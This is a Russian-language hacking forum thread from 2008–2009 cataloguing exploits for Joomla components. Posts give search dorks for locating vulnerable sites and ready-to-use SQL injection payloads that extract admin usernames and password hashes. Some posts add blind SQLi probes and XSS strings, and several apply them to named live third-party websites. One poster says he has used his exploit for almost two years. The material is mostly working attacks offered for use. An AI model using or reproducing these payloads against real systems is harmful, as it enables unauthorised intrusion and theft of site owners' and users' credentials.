ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #111  
Старый 14.12.2008, 15:39
Аватар для Grey
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Joomla Component Userlist SQL-INJ

Уязвимый продукт: Joomla Component Userlist
Версия: 2.5 (в более ранних версиях не прокатывает - другой запрос)
Дорк: "inurl:com_userlist"

SQL-INJ

Необходимое условие: magic_quotes_gpc = Off
Уязвимость в файле userlist.php.
Уязвимый кусок кода:

PHP код:
if ($search != "") {
        
$query .= " WHERE (u.name LIKE '%$search%' OR u.username LIKE '%$search%')"
Параметр $search не фильтруется, но обрамляется в кавычки, значит без ковычек тут не обойтись.

Эксплуатация:

В поле поиска пользователя вбиваем следующее:
Код:
1' and 1=2) and 1=2 union select 1,2,3,4,5,6-- 1
Получаем логин и пароль:
Код:
1' and 1=2) and 1=2 union select concat(username,char(58),password),2,3,4,5,6 from jos_users-- 1
Уязвимости предыдущих версий:
Код:
Версия 2.0 SQL-INJ /index.php?option=com_userlist&limitstart=0,0+union+select+1,2,3,4--+1

Последний раз редактировалось Grey; 14.12.2008 в 18:19..
 
Ответить с цитированием

  #112  
Старый 14.12.2008, 23:04
Аватар для Ded MustD!e
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию

Joomla Component Productbook Blind-SQL

Уязвимый продукт: Joomla Component Productbook
Версия: 1.0.4
Дорк: "inurl:com_productbook"

Blind SQL-INJ

Уязвимость в файле productbook.php.
Уязвимый кусок кода:

PHP код:
$database->setQuery("SELECT a.*, cc.name AS category "
               
" \n FROM #__productbook AS a, #__productbook_catg AS cc "
               
" \n WHERE a.catid=cc.cid AND a.id=$id "
               
" \n AND cc.access<='$gid'"); 
Exploit:
Код:
 
true: /index.php?option=com_productbook&Itemid=97&func=detail&id=351+and+and+1=1
false: /index.php?option=com_productbook&Itemid=97&func=detail&id=351+and+and+1=2
Example:
Код:
 
true: http://www.jovani.com/index.php?option=com_productbook&func=detail&Itemid=7&id=10153+and+substring(version(),1,1)=5
false: http://www.jovani.com/index.php?option=com_productbook&func=detail&Itemid=7&id=10153+and+substring(version(),1,1)=4
__________________
Feci, quod potui. Faciant meliora potentes.

Последний раз редактировалось Ded MustD!e; 14.12.2008 в 23:07..
 
Ответить с цитированием

XSS в модуле com_frontpage в параметре fontstyle.
  #113  
Старый 19.12.2008, 18:24
Аватар для foopi
foopi
Познающий
Регистрация: 26.10.2008
Сообщений: 50
Провел на форуме:
536527

Репутация: 62
Отправить сообщение для foopi с помощью ICQ
По умолчанию XSS в модуле com_frontpage в параметре fontstyle.

Код:
Код:
/index.php?option=com_frontpage&Itemid=1&fontstyle=%22%3E%3Cscript%3Ealert(/Xa-xa/)%3C/script%3E
Примеры:
Код:
http://www.l2hell.ru/index.php?option=com_frontpage&Itemid=1&fontstyle=%22%3E%3Cscript%3Ealert(/Xa-xa/)%3C/script%3E
Код:
http://uasos.com/index.php?Itemid=1&limit=14&limitstart=10696&option=com_frontpage&fontstyle=%22%3E%3Cscript%3Ealert(/Xa-xa/)%3C/script%3E
 
Ответить с цитированием

  #114  
Старый 22.12.2008, 02:47
Аватар для chekist
chekist
Reservists Of Antichat - Level 6
Регистрация: 14.11.2007
Сообщений: 177
Провел на форуме:
1246854

Репутация: 622
По умолчанию

Уязвимый продукт: Joomla Component Extcalendar
Дорк: "inurl:com_extcalendar"

Код:
http://[target]/[path]/components/com_extcalendar/cal_popup.php?extmode=view&extid=0'+union+select+1,1,concat(name,0x3a,username,0x3a,email,0x3a,password),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+%23__users+where+gid=25+or+gid=24+limit+0,1/*
Таже бага тока в новой упаковке


Уязвимый продукт: Joomla Component JCalPro
Дорк: "inurl:com_jcalpro"

Код:
http://[target]/[path]/components/com_jcalpro/cal_popup.php?extmode=view&extid=0'+union+select+1,1,concat(name,0x3a,username,0x3a,email,0x3a,password),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+%23__users+where+gid=25+or+gid=24+limit+0,1/*
PS юзаю почти 2 года
 
Ответить с цитированием

Joomla Component com_hbssearch(r_type) Blind SQL-injection
  #115  
Старый 22.12.2008, 16:52
Аватар для Rubaka
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
Отправить сообщение для Rubaka с помощью ICQ
По умолчанию Joomla Component com_hbssearch(r_type) Blind SQL-injection

Joomla Component com_hbssearch(r_type) Blind SQL-injection

http://localhost/Path/index.php?option=com_hbssearch&task=showhoteldetai ls&id=1&r_type=[SQL-vulnerability]

LiveDEMO:

http://demo.joomlahbs.com/p1/index.php?option=com_hbssearch&task=showhoteldetai ls&id=4&r_type=1 and substring(@@version,1,1)=4&chkin=2008-08-15&chkout=2008-08-18&datedif=3&str_day=Fri&end_day=Mon&start_day=&st ar=&child1=0&adult1=1&Itemid=54 -->FALSE

http://demo.joomlahbs.com/p1/index.php?option=com_hbssearch&task=showhoteldetai ls&id=4&r_type=1 and substring(@@version,1,1)=5&chkin=2008-08-15&chkout=2008-08-18&datedif=3&str_day=Fri&end_day=Mon&start_day=&st ar=&child1=0&adult1=1&Itemid=54 -->TRUE

# milw0rm.com [2008-12-21]

Joomla Component com_tophotelmodule(id) Blind SQL-injection

Example:
http://demo.joomlahbs.com/p2/index.php?option=com_tophotelmodule&task=showhotel details&id=[SQL-vulnerability]


LiveDEMO:

http://demo.joomlahbs.com/p2/index.php?option=com_tophotelmodule&task=showhotel details&id=1 and substring(@@version,1,1)=4 -->FALSE

http://demo.joomlahbs.com/p2/index.php?option=com_tophotelmodule&task=showhotel details&id=1 and substring(@@version,1,1)=5 -->TRUE

# milw0rm.com [2008-12-21]

Последний раз редактировалось Rubaka; 22.12.2008 в 16:55..
 
Ответить с цитированием

  #116  
Старый 24.12.2008, 02:32
Аватар для swt1
swt1
Постоянный
Регистрация: 16.02.2008
Сообщений: 395
Провел на форуме:
3370466

Репутация: 96
По умолчанию

Joomla Component com_allhotels (id) Blind SQL Injection Vulnerability
____________
http://www.milw0rm.com/exploits/7568

:::::::

Joomla Component com_lowcosthotels (id) Blind SQL Injection Vulnerability
____________
http://www.milw0rm.com/exploits/7567
 
Ответить с цитированием

  #117  
Старый 25.12.2008, 00:36
Аватар для swt1
swt1
Постоянный
Регистрация: 16.02.2008
Сообщений: 395
Провел на форуме:
3370466

Репутация: 96
По умолчанию

Joomla Component Ice Gallery 0.5b2 (catid) Blind SQL Injection Vuln
_________
http://www.milw0rm.com/exploits/7572

::::

Joomla Component Live Ticker 1.0 (tid) Blind SQL Injection Vuln
_________
http://www.milw0rm.com/exploits/7573

:::::

Joomla Component mdigg 2.2.8 (category) SQL Injection Vuln
__________
http://www.milw0rm.com/exploits/7574

:::::

Joomla Component 5starhotels (id) SQL Injection Exploit
__________
http://www.milw0rm.com/exploits/7575

Последний раз редактировалось swt1; 25.12.2008 в 00:41..
 
Ответить с цитированием

  #118  
Старый 05.01.2009, 23:54
Аватар для swt1
swt1
Постоянный
Регистрация: 16.02.2008
Сообщений: 395
Провел на форуме:
3370466

Репутация: 96
По умолчанию

Joomla com_phocadocumentation (id) Remote SQL Injection Exploit
__________
http://www.milw0rm.com/exploits/7670

:::::

Joomla com_na_newsdescription (newsid) SQL Injection Exploit

__________
http://www.milw0rm.com/exploits/7669

:::::
__________
Joomla Component simple_review 1.x SQL Injection Vulnerability

:::::

http://www.milw0rm.com/exploits/7667

Последний раз редактировалось swt1; 05.01.2009 в 23:57..
 
Ответить с цитированием

  #119  
Старый 10.01.2009, 18:17
Аватар для eLWAux
eLWAux
Members of Antichat - Level 5
Регистрация: 15.06.2008
Сообщений: 941
Провел на форуме:
5111568

Репутация: 2399


Отправить сообщение для eLWAux с помощью ICQ
По умолчанию

Компонент ReMOSitory 341RE (com_remository)
XSS

/index.php?option=com_remository&Itemid=1&func=sele ct_XSS&

Пример:

http://studik.lviv.ua/index.php?option=com_remository&Itemid=44&func=sel ect_<img src="" onerror=alert('xss') xxx&id=1&orderby=2&page=2
 
Ответить с цитированием

  #120  
Старый 14.01.2009, 10:08
Аватар для z00MAN
z00MAN
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980

Репутация: 930
По умолчанию

Двиг: Joomla
Компонент: com_gigcal(gigcal_gigs_id)
Уязвимость: SQL-injection

Код:
http://localhost/Path/index.php?option=com_gigcal&task=details&gigcal_gigs_id='+and+1=2/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,concat(username,char(58),password),0,11,12+from+jos_users/*
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обзор уязвимостей в форумных движках] Grey Форумы 48 28.12.2009 20:03
Обзор бесплатных Cms em00s7 PHP, PERL, MySQL, JavaScript 16 03.07.2009 13:13
Cms Cawabunga PHP, PERL, MySQL, JavaScript 20 05.08.2007 00:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ